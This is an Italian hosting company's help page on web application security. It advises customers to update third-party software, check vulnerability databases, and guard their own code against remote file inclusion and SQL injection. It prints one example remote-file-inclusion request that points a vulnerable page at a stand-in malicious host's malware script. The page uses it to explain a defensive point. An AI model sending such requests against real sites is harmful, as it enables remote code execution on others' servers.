Home I nostri servizi Chi siamo | Mission | F.a.q | Assistenza | Rivenditori | Web Farm
 
 
HOSTING
9NET POSTA CERTIFICATA
FIRMA DIGITALE
MARCA TEMPORALE
CLOUD COMPUTING
OBJECT STORAGE
CLOUD MONITORING
PRIVATE CLOUD
SERVER
FILE SHARING
ECOMMERCE
HDSL
STREAMING
SERVIZI DI COMUNICAZIONE
VOLETE SAPERNE DI PIU' ?
Il nostro ufficio commerciale è a Vostra disposizione per qualsiasi informazione.
 
 
Richiedi Informazioni
 
Sarete contattati al più presto con la soluzione giusta per il Vostro business.
Root / 10 - Sicurezza / SICUREZZA DELLE VOSTRE APPLICAZIONI WEB


SICUREZZA DELLE VOSTRE APPLICAZIONI WEB
 

Per non incorrere in problemi di sicurezza sulle pagine del proprio sito Ŕ necessario mantenere in sicurezza le applicazioni web pubblicate. E' infatti possibile che pagine il cui codice non Ŕ scritto in modo sicuro siano vulnerabili a vari tipi di attacchi, quali XSS o SQL injection. Questo tipo di vulnerabilitÓ sono indipendenti dalla sicurezza del webserver, in quanto vengono sfruttate con normali richieste HTTP, appositamente formate per utilizzare il codice delle pagine web in modo fraudolento.


 Le operazioni da effettuare periodicamente per evitare questo tipo di problema si differenziano nel caso in cui si utilizzi un'applicazione web sviluppata da terzi oppure una sviluppata in proprio.



APPLICAZIONI SVILUPPATE DA TERZI


 Per pubblicare il proprio sito Ŕ possibile trovare in rete una moltitudine di applicazioni "preconfezionate" scritte in vari linguaggi e con supporto a diversi tipi di database. Le tipologie di questi applicativi comprendono forum, e-commerce, webmail, guestbook e molto altro ancora. Tutti questi applicativi possono presentare vulnerabilitÓ di vario genere sfruttabili da un malintenzionato. Per prevenire questo tipo di problemi Ŕ necessario verificare periodicamente la presenza di versioni aggiornate delle applicazioni utilizzate, in genere gli aggiornamenti sono disponibili direttamente dalla home page dello sviluppatore.


 Purtroppo non sempre un'applicazione aggiornata alla sua ultima versione Ŕ sicura, per reperire informazioni sulle vulnerabilitÓ note e su quali versioni di applicativo ne sono affette sono disponibili due ottimi siti :
http://www.securityfocus.com/vulnerabilities
http://secunia.com/search/


Nel caso in cui una delle applicazioni che si sta utilizzando non sia attualmente sicura Ŕ caldamente consigliato di sospenderne l'utilizzo oppure cercare un'applicazione similare non affetta da vulnerabilitÓ.


Il controllo degli aggiornamenti disponibili per le applicazioni utilizzate deve essere fatto periodicamente. Per essere efficace va ripetuto almeno una volta al mese.


In caso venga interrotto definitivamente il supporto all'applicazione utilizzata Ŕ consigliabile di passare quanto prima ad un'altro applicativo dello stesso tipo che sia ancora attivamente supportato.



APPLICAZIONI SVILUPPATE IN PROPRIO


La cosa pi¨ importante per le applicazioni sviluppate in proprio Ŕ realizzarle in modo che non siano vulnerabili perlomeno a RFI (Remote File Inclusion), tecnica che permette di richiamare via Url il contenuto di una pagina differente da quella caricata e visualizzare sensibili informazioni sul contenuto del vostro sito. In genere questo tipo di vulnerabilitÓ viene sfruttato con richieste HTTP simili alla seguente :
http://www.tuodominio.com/index.php?agina=http://www.sitomalevolo.com/malware.php?


Dove index.php Ŕ la propria pagina web contenente la vulnerabilitÓ e malware.php Ŕ invece una pagina con codice malevolo pubblicata su un server esterno. Tramite queste richieste viene tentata l'esecuzione del codice malevolo remoto sul server dove risiede il proprio dominio.


E' molto importante anche evitare SQLInjection (inoculazione di query sql indesiderate) sul proprio database mysql-mssql. Una descrizione di questo tipo di vulnerabilitÓ si pu˛ trovare nella pagina: http://it.wikipedia.org/wiki/SQL_injection


In rete sono disponibili numerose guide per la scrittura di codice sicuro nei vari linguaggi di programmazione.



Argomenti correlati
OPERAZIONI CONSIGLIATE PER LA SICUREZZA DEL PC
OPERAZIONI CONSIGLIATE PER LA SICUREZZA DEI DATI
VULNERABILITA' JOOMLA ver. 1.5
COME COMPORTARSI IN CASO DI CODICE MALEVOLO SUL PROPRIO SITO
CODICE MALEVOLO (Alcuni esempi)



9Net S.r.l. - Via Caldera 21, 20153 Milano (MI) - Tel. 02 39.19.091 Fax 02 39.19.09.29 - P.Iva e C.F. 02714840960 - R.E.A. 1542830
Copyright 2007 - All right reserved - Informativa sulla privacy
ATOdesign